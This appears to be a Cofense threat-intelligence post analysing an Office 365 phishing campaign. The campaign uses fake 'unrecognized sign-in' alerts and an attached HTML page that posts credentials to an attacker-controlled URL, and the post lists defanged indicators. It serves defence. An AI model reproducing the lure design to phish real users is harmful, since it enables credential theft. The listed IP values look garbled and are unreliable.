Microsoft O365 EOP/ATP
IronPort
TrendMicro
Mimecast
Symantec
By Luis Raul Parra, Cofense Phishing Defense Center
At some point in your (digital) life you have received annoying notifications about unexpected sign–in attempts to one of your accounts/services, and you have ignored them. After all, it was just an attempt – no one was able to access anything. Yet, if you are vigilant enough, you would report this unauthorized attempt to the service provider and contribute to enhancing security. Well done! But keep reading; this article is for you.
The Cofense Phishing Defense Center (PDC) has observed a new phishing campaign that aims to harvest Office365 (O365) credentials of “vigilant” users who want to act on unrecognized sign-in attempts to their accounts.
The campaign was reported by users in several companies across English–speaking countries including the United States, England and Scotland. The message was carefully crafted to pass as a real alert of an unexpected sign-in on the recipient’s corporate account. It urged immediate action.
Figure 1: Email Body
All reported emails used the same technique to customize the attack: The “From” field contained the address “[email protected]” in order to convince the end user that this was a valid alert notification from their company’s email security system.
Figure 2: Email Header
The subject of the email states that there was a sign-in attempt to the user’s account from an unrecognized device, specifying the name of the user and claiming to come from “COMPANYNAME Mail Service”. The content of the body states the timestamp, location, IP address and device where the (false) attempt was performed. In all cases, the IP address shown in the body was 1942097762.
To make the email even more credible, the attackers included a confirmation code stated to be valid for 24 hours with aims of pressuring the recipient to act within that time. They were thoughtful enough to add the message “if this was you, you’re all set!”
Furthermore, there was the option to click on the “Unsubscribe” button in order to stop receiving future messages like these. The URL behind a link of the type hxxps://tracking[.]mail[.]netflix[.]tshirtsintaramerica[.]com/click/* is possibly just a tracker that then redirected to the official company website.
The credential phishing attempt was done through an HTML file attached to the email. Images and CSS styles were pulled from a different website: hxxps://youmustlast[.]website/wassets/:
Figure 3: CSS Style
The HTML file already contained the user’s email address in the email account address field:
Figure 4: Phishing Page
Should the recipient enter the corporate credentials into the attached HTML page, a POST action sends the username and password to the threat actor and the URL hxxps://sharepreview[.]site/win/next[.]php
Figure 5: POST Action
Credential phishing done. At the same time, you’ve been made to feel vigilant at having spotted something untoward happening with your account. That’s how the attackers attempt to trip up alert and conscientious users.
| Network IOC | IP |
| hXXps://sharepreview[.]site/win/nextphp | 23254130108 |
| hXXps://youmustlast[.]website/wassets/statuspagecss | 632503873 |
